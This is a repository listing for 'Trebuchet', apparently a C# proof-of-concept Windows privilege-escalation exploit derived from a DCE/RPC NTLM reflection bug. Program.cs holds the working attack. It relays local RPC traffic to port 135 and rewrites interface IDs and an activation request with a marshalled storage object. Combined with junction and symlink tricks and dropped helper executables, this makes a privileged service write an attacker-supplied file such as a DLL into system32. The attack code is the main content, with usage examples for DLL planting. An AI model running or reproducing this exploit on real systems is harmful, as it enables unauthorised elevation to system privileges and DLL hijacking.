/Trebuchet/PackageBuilder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace Trebuchet 9 | { 10 | class PackageBuilder 11 | { 12 | static byte[] header = { 13 | 0x01, 0x05, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 14 | 0x50, 0x61, 0x63, 0x6B, 0x61, 0x67, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 15 | 0x00, 0x00, 0x00, 0x00 16 | }; 17 | 18 | static byte[] trailingHeader = { 19 | 0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 20 | }; 21 | 22 | static byte[] BuildPackageList(string path, byte[] data) 23 | { 24 | //string file = Path.GetFileName(path) + "/\0"; 25 | string file = "XXX\0"; 26 | path = path + "/\0"; 27 | 28 | MemoryStream stm = new MemoryStream(); 29 | BinaryWriter writer = new BinaryWriter(stm); 30 | byte[] pathbytes = Encoding.ASCII.GetBytes(path); 31 | 32 | writer.Write((ushort)2); 33 | writer.Write(Encoding.ASCII.GetBytes(file)); 34 | writer.Write(Encoding.ASCII.GetBytes("XXX\0")); 35 | writer.Write(0x30001); 36 | writer.Write(pathbytes.Length); 37 | writer.Write(pathbytes); 38 | writer.Write(data.Length); 39 | writer.Write(data); 40 | writer.Write((ushort)0); 41 | 42 | return stm.ToArray(); 43 | } 44 | 45 | public static byte[] BuildPackage(string path, byte[] data) 46 | { 47 | MemoryStream stm = new MemoryStream(); 48 | BinaryWriter writer = new BinaryWriter(stm); 49 | byte[] packageData = BuildPackageList(path, data); 50 | 51 | writer.Write(header); 52 | writer.Write(packageData.Length); 53 | writer.Write(packageData); 54 | writer.Write(trailingHeader); 55 | 56 | return stm.ToArray(); 57 | } 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /Trebuchet/Program.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.VisualStudio.OLE.Interop; 2 | using System; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.Net; 6 | using System.Net.Sockets; 7 | using System.Text; 8 | using System.Threading; 9 | 10 | namespace Trebuchet 11 | { 12 | class Program 13 | { 14 | class RpcHeader 15 | { 16 | public byte MajorVersion; 17 | public byte MinorVersion; 18 | public byte PacketType; 19 | public byte PacketFlags; 20 | public uint DataRepresentation; 21 | public ushort FragLength; 22 | public ushort AuthLength; 23 | public uint CallId; 24 | public byte[] Data; 25 | public byte[] AuthData; 26 | 27 | public static RpcHeader FromStream(BinaryReader reader) 28 | { 29 | RpcHeader header = new RpcHeader(); 30 | header.MajorVersion = reader.ReadByte(); 31 | header.MinorVersion = reader.ReadByte(); 32 | header.PacketType = reader.ReadByte(); 33 | header.PacketFlags = reader.ReadByte(); 34 | header.DataRepresentation = reader.ReadUInt32(); 35 | header.FragLength = reader.ReadUInt16(); 36 | header.AuthLength = reader.ReadUInt16(); 37 | header.CallId = reader.ReadUInt32(); 38 | 39 | header.Data = reader.ReadBytes(header.FragLength - header.AuthLength - 16); 40 | header.AuthData = reader.ReadBytes(header.AuthLength); 41 | 42 | return header; 43 | } 44 | 45 | public void ToStream(BinaryWriter writer) 46 | { 47 | MemoryStream stm = new MemoryStream(); 48 | BinaryWriter w = new BinaryWriter(stm); 49 | 50 | w.Write(MajorVersion); 51 | w.Write(MinorVersion); 52 | w.Write(PacketType); 53 | w.Write(PacketFlags); 54 | w.Write(DataRepresentation); 55 | w.Write((ushort)(Data.Length + AuthData.Length + 16)); 56 | w.Write((ushort)AuthData.Length); 57 | w.Write(CallId); 58 | w.Write(Data); 59 | w.Write(AuthData); 60 | 61 | writer.Write(stm.ToArray()); 62 | } 63 | } 64 | 65 | class RpcContextSplit 66 | { 67 | public TcpClient client; 68 | public BinaryReader clientReader; 69 | public BinaryWriter clientWriter; 70 | public TcpClient server; 71 | public BinaryReader serverReader; 72 | public BinaryWriter serverWriter; 73 | public byte[] objref; 74 | 75 | public RpcContextSplit(TcpClient client, TcpClient server) 76 | { 77 | this.client = client; 78 | this.server = server; 79 | clientReader = new BinaryReader(client.GetStream()); 80 | clientWriter = new BinaryWriter(client.GetStream()); 81 | serverReader = new BinaryReader(server.GetStream()); 82 | serverWriter = new BinaryWriter(server.GetStream()); 83 | } 84 | } 85 | 86 | static byte[] oxidResolveIID = { 87 | 0xC4, 0xFE, 0xFC, 0x99, 0x60, 0x52, 0x1B, 0x10, 0xBB, 0xCB, 0x00, 0xAA, 88 | 0x00, 0x21, 0x34, 0x7A 89 | }; 90 | 91 | static byte[] systemActivatorIID = { 92 | 0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00, 93 | 0x00, 0x00, 0x00, 0x46 94 | }; 95 | 96 | static int FindBytes(byte[] src, int startIndex, byte[] find) 97 | { 98 | int index = -1; 99 | int matchIndex = 0; 100 | // handle the complete source array 101 | for (int i = startIndex; i < src.Length; i++) 102 | { 103 | if (src[i] == find[matchIndex]) 104 | { 105 | if (matchIndex == (find.Length - 1)) 106 | { 107 | index = i - matchIndex; 108 | break; 109 | } 110 | matchIndex++; 111 | } 112 | else 113 | { 114 | matchIndex = 0; 115 | } 116 | 117 | } 118 | return index; 119 | } 120 | 121 | static byte[] ReplaceBytes(byte[] src, byte[] search, byte[] repl) 122 | { 123 | byte[] dst = null; 124 | int index = FindBytes(src, 0, search); 125 | while(index >= 0) 126 | { 127 | //Console.WriteLine("Found Match at {0}", index); 128 | dst = new byte[src.Length - search.Length + repl.Length]; 129 | // before found array 130 | Buffer.BlockCopy(src, 0, dst, 0, index); 131 | // repl copy 132 | Buffer.BlockCopy(repl, 0, dst, index, repl.Length); 133 | // rest of src array 134 | Buffer.BlockCopy( 135 | src, 136 | index + search.Length, 137 | dst, 138 | index + repl.Length, 139 | src.Length - (index + search.Length)); 140 | src = dst; 141 | index = FindBytes(src, index + 1, search); 142 | } 143 | return dst; 144 | } 145 | 146 | /// 147 | /// Read from the client socket and send to server 148 | /// 149 | /// 150 | static void ReaderThread(object o) 151 | { 152 | RpcContextSplit ctx = (RpcContextSplit)o; 153 | bool isauth = false; 154 | bool replacediid = false; 155 | 156 | try 157 | { 158 | while (true) 159 | { 160 | RpcHeader header = RpcHeader.FromStream(ctx.clientReader); 161 | 162 | if (!isauth && header.AuthLength > 0) 163 | { 164 | isauth = true; 165 | } 166 | 167 | if (isauth) 168 | { 169 | if (!replacediid) 170 | { 171 | byte[] b = ReplaceBytes(header.Data, oxidResolveIID, systemActivatorIID); 172 | if (b != null) 173 | { 174 | header.Data = b; 175 | replacediid = true; 176 | } 177 | } 178 | else 179 | { 180 | // Is a RPC request 181 | if (header.PacketType == 0) 182 | { 183 | //Console.WriteLine("Changing activation at localsystem"); 184 | 185 | byte[] actData = Trebuchet.Properties.Resources.request; 186 | 187 | for (int i = 0; i < ctx.objref.Length; ++i) 188 | { 189 | // Replace the marshalled IStorage object 190 | actData[i + 0x368] = ctx.objref[i]; 191 | } 192 | 193 | RpcHeader newHeader = RpcHeader.FromStream(new BinaryReader(new MemoryStream(actData))); 194 | 195 | // Fixup callid 196 | newHeader.CallId = header.CallId; 197 | 198 | header = newHeader; 199 | } 200 | } 201 | } 202 | 203 | //Console.WriteLine("=> Packet: {0} Data: {1} Auth: {2} {3}", header.PacketType, header.FragLength, header.AuthLength, isauth); 204 | 205 | header.ToStream(ctx.serverWriter); 206 | } 207 | } 208 | catch (Exception ex) 209 | { 210 | Console.WriteLine(ex); 211 | } 212 | 213 | Console.WriteLine("Stopping Reader Thread"); 214 | 215 | ctx.client.Client.Shutdown(SocketShutdown.Receive); 216 | ctx.server.Client.Shutdown(SocketShutdown.Send); 217 | } 218 | 219 | static void WriterThread(object o) 220 | { 221 | RpcContextSplit ctx = (RpcContextSplit)o; 222 | try 223 | { 224 | while (true) 225 | { 226 | RpcHeader header = RpcHeader.FromStream(ctx.serverReader); 227 | 228 | //Console.WriteLine("<= Packet: {0} Data: {1} Auth: {2}", header.PacketType, header.FragLength, header.AuthLength); 229 | header.ToStream(ctx.clientWriter); 230 | } 231 | } 232 | catch(Exception ex) 233 | { 234 | Console.WriteLine(ex); 235 | } 236 | 237 | Console.WriteLine("Stopping Writer Thread"); 238 | ctx.client.Client.Shutdown(SocketShutdown.Send); 239 | ctx.server.Client.Shutdown(SocketShutdown.Receive); 240 | } 241 | 242 | 243 | const int DUMMY_LOCAL_PORT = 6666; 244 | 245 | static string GenRandomName() 246 | { 247 | Random r = new Random(); 248 | StringBuilder builder = new StringBuilder(); 249 | 250 | for (int i = 0; i < 8; i++) 251 | { 252 | int c = r.Next(26); 253 | builder.Append((char)('A' + c)); 254 | } 255 | 256 | return builder.ToString(); 257 | } 258 | 259 | static bool CreateJunction(string path, string target) 260 | { 261 | string cmdline = String.Format("cmd /c mklink /J {0} {1}", path, target); 262 | 263 | ProcessStartInfo si = new ProcessStartInfo("cmd.exe", cmdline); 264 | si.UseShellExecute = false; 265 | 266 | Process p = Process.Start(si); 267 | p.WaitForExit(); 268 | 269 | return p.ExitCode == 0; 270 | } 271 | 272 | static bool CreateSymlink(string path, string target) 273 | { 274 | string cmdline = String.Format("cmd /c C:\\users\\public\\libraries\\createsymlink.exe \"{0}\" \"{1}\"", path, target); 275 | 276 | ProcessStartInfo si = new ProcessStartInfo("cmd.exe", cmdline); 277 | si.UseShellExecute = false; 278 | 279 | Process symLinkProc = Process.Start(si); 280 | Thread.Sleep(2000); 281 | 282 | return symLinkProc.HasExited; 283 | } 284 | 285 | [MTAThread] 286 | static void DoRpcTest(object o, ref RpcContextSplit ctx, string rock, string castle) 287 | { 288 | ManualResetEvent ev = (ManualResetEvent)o; 289 | TcpListener listener = new TcpListener(IPAddress.Loopback, DUMMY_LOCAL_PORT); 290 | byte[] rockBytes = null; 291 | 292 | try { rockBytes = File.ReadAllBytes(rock); } 293 | catch 294 | { 295 | Console.WriteLine("[!] Error reading initial file!"); 296 | Environment.Exit(1); 297 | } 298 | 299 | Console.WriteLine(String.Format("[+] Loaded in {0} bytes.", rockBytes.Length)); 300 | 301 | bool is64bit = !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432")); 302 | try 303 | { 304 | Console.WriteLine("[+] Getting out our toolbox..."); 305 | if (is64bit) 306 | { 307 | File.WriteAllBytes("C:\\users\\public\\libraries\\createsymlink.exe", Trebuchet.Properties.Resources.CreateSymlinkx64); 308 | } 309 | else 310 | { 311 | File.WriteAllBytes("C:\\users\\public\\libraries\\createsymlink.exe", Trebuchet.Properties.Resources.CreateSymlinkx86); 312 | } 313 | } 314 | catch 315 | { 316 | Console.WriteLine("[!] Error writing to C:\\users\\public\\libraries\\createsymlink.exe!"); 317 | Environment.Exit(1); 318 | } 319 | 320 | string name = GenRandomName(); 321 | string windir = Environment.GetFolderPath(Environment.SpecialFolder.Windows); 322 | 323 | string tempPath = Path.Combine(windir, "temp", name); 324 | if (!CreateJunction(tempPath, "\"C:\\users\\public\\libraries\\Sym\\")) 325 | { 326 | Console.WriteLine("[!] Couldn't create the junction"); 327 | Environment.Exit(1); 328 | } 329 | 330 | if (CreateSymlink("C:\\users\\public\\libraries\\Sym\\ (2)", castle)) //Exit bool is inverted! 331 | { 332 | Console.WriteLine("[!] Couldn't create the SymLink!"); 333 | Environment.Exit(1); 334 | } 335 | 336 | IStorage stg = ComUtils.CreatePackageStorage(name, rockBytes); 337 | byte[] objref = ComUtils.GetMarshalledObject(stg); 338 | 339 | listener.Start(); 340 | 341 | ev.Set(); 342 | 343 | while (true) 344 | { 345 | try 346 | { 347 | TcpClient client = listener.AcceptTcpClient(); 348 | TcpClient server = new TcpClient("127.0.0.1", 135); 349 | 350 | //Console.WriteLine("Connected"); 351 | 352 | client.NoDelay = true; 353 | server.NoDelay = true; 354 | 355 | ctx = new RpcContextSplit(client, server); 356 | ctx.objref = objref; 357 | 358 | Thread t = new Thread(ReaderThread); 359 | t.IsBackground = true; 360 | t.Start(ctx); 361 | 362 | t = new Thread(WriterThread); 363 | t.IsBackground = true; 364 | t.Start(ctx); 365 | } 366 | catch (Exception ex) 367 | { 368 | Console.WriteLine(ex); 369 | } 370 | } 371 | } 372 | 373 | static void Main(string[] args) 374 | { 375 | try 376 | { 377 | ManualResetEvent e = new ManualResetEvent(false); 378 | 379 | RpcContextSplit ctx = null; 380 | 381 | if (args.Length < 2) 382 | { 383 | Console.WriteLine("[+] Usage: Trebuchet [startFile] [destination]"); 384 | Console.WriteLine(" Example: Trebuchet C:\\users\\public\\libraries\\cryptsp.dll C:\\windows\\system32\\wbem\\cryptsp.dll"); 385 | System.Environment.Exit(1); 386 | } 387 | 388 | string rock = args[0]; 389 | string castle = args[1]; 390 | 391 | Thread t = new Thread(() => DoRpcTest(e, ref ctx, rock, castle)); 392 | 393 | t.IsBackground = true; 394 | t.Start(); 395 | e.WaitOne(); 396 | try 397 | { 398 | ComUtils.BootstrapComMarshal(DUMMY_LOCAL_PORT); 399 | } 400 | catch 401 | { 402 | Console.WriteLine("[+] We Broke RPC! (Probably a good thing)"); 403 | } 404 | 405 | Process symLinkProc = null; 406 | foreach (var process in Process.GetProcessesByName("CreateSymlink")) 407 | { 408 | symLinkProc = process; 409 | break; 410 | } 411 | Console.WriteLine("[+] Waiting for CreateSymlink to close..."); 412 | symLinkProc.WaitForExit(); 413 | Console.WriteLine("[+] Cleaning Up!"); 414 | try { 415 | File.Delete("C:\\users\\public\\libraries\\CreateSymlink.exe"); 416 | }catch{ 417 | Console.WriteLine("[!] Failed to delete C:\\users\\public\\libraries\\CreateSymlink.exe"); 418 | } 419 | ctx.client.Client.Shutdown(SocketShutdown.Send); 420 | ctx.server.Client.Shutdown(SocketShutdown.Receive); 421 | } 422 | catch (Exception ex) 423 | { 424 | Console.WriteLine(ex); 425 | } 426 | 427 | 428 | } 429 | } 430 | } 431 | -------------------------------------------------------------------------------- /Trebuchet/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Trebuchet")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Trebuchet")] 13 | [assembly: AssemblyCopyright("Copyright © 2015")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d6770b2d-bbd1-49ef-9daa-661b972ea606")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Trebuchet/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.0 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Trebuchet.Properties { 12 | using System; 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | public class Resources { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resources() { 33 | } 34 | 35 | /// 36 | /// Returns the cached ResourceManager instance used by this class. 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | public static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Trebuchet.Properties.Resources", typeof(Resources).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// Overrides the current thread's CurrentUICulture property for all 51 | /// resource lookups using this strongly typed resource class. 52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | public static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// Looks up a localized resource of type System.Byte[]. 65 | /// 66 | public static byte[] CreateSymlinkx64 { 67 | get { 68 | object obj = ResourceManager.GetObject("CreateSymlinkx64", resourceCulture); 69 | return ((byte[])(obj)); 70 | } 71 | } 72 | 73 | /// 74 | /// Looks up a localized resource of type System.Byte[]. 75 | /// 76 | public static byte[] CreateSymlinkx86 { 77 | get { 78 | object obj = ResourceManager.GetObject("CreateSymlinkx86", resourceCulture); 79 | return ((byte[])(obj)); 80 | } 81 | } 82 | 83 | /// 84 | /// Looks up a localized resource of type System.Byte[]. 85 | /// 86 | public static byte[] Microsoft_VisualStudio_OLE_Interop { 87 | get { 88 | object obj = ResourceManager.GetObject("Microsoft_VisualStudio_OLE_Interop", resourceCulture); 89 | return ((byte[])(obj)); 90 | } 91 | } 92 | 93 | /// 94 | /// Looks up a localized resource of type System.Byte[]. 95 | /// 96 | public static byte[] request { 97 | get { 98 | object obj = ResourceManager.GetObject("request", resourceCulture); 99 | return ((byte[])(obj)); 100 | } 101 | } 102 | } 103 | } 104 | -------------------------------------------------------------------------------- /Trebuchet/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | ..\resources\createsymlinkx64.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 123 | 124 | 125 | ..\resources\createsymlinkx86.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 126 | 127 | 128 | ..\Microsoft.VisualStudio.OLE.Interop.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 129 | 130 | 131 | ..\request.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 132 | 133 | -------------------------------------------------------------------------------- /Trebuchet/Resources/CreateSymlinkx64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/Resources/CreateSymlinkx64.exe -------------------------------------------------------------------------------- /Trebuchet/Resources/CreateSymlinkx86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/Resources/CreateSymlinkx86.exe -------------------------------------------------------------------------------- /Trebuchet/Trebuchet.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {02385F73-4546-4193-A112-EF17E4EADA62} 8 | Exe 9 | Properties 10 | Trebuchet 11 | Trebuchet 12 | v4.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | False 37 | .\Microsoft.VisualStudio.OLE.Interop.dll 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | True 57 | True 58 | Resources.resx 59 | 60 | 61 | 62 | 63 | PublicResXFileCodeGenerator 64 | Resources.Designer.cs 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 83 | -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Trebuchet.exe -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Trebuchet.pdb -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Trebuchet.vshost.exe -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Poc_DCERPCNTLMReflection_EoP.exe 2 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Poc_DCERPCNTLMReflection_EoP.pdb 3 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache 4 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources 5 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache 6 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.exe 7 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Poc_DCERPCNTLMReflection_EoP.pdb 8 | -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.exe -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.pdb -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/Trebuchet.Properties.Resources.resources -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Trebuchet.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.csprojResolveAssemblyReference.cache 2 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.Properties.Resources.resources 3 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.csproj.GenerateResource.Cache 4 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Trebuchet.exe 5 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\bin\Debug\Trebuchet.pdb 6 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.exe 7 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Poc_DCERPCNTLMReflection_EoP\obj\Debug\Trebuchet.pdb 8 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.exe 9 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.pdb 10 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\bin\Debug\Trebuchet.exe 11 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\bin\Debug\Trebuchet.pdb 12 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.csprojResolveAssemblyReference.cache 13 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.Properties.Resources.resources 14 | C:\Users\Nick.SBS\ownCloud\Nick\google-security-research\poc\src\Trebuchet\obj\Debug\Trebuchet.csproj.GenerateResource.Cache 15 | 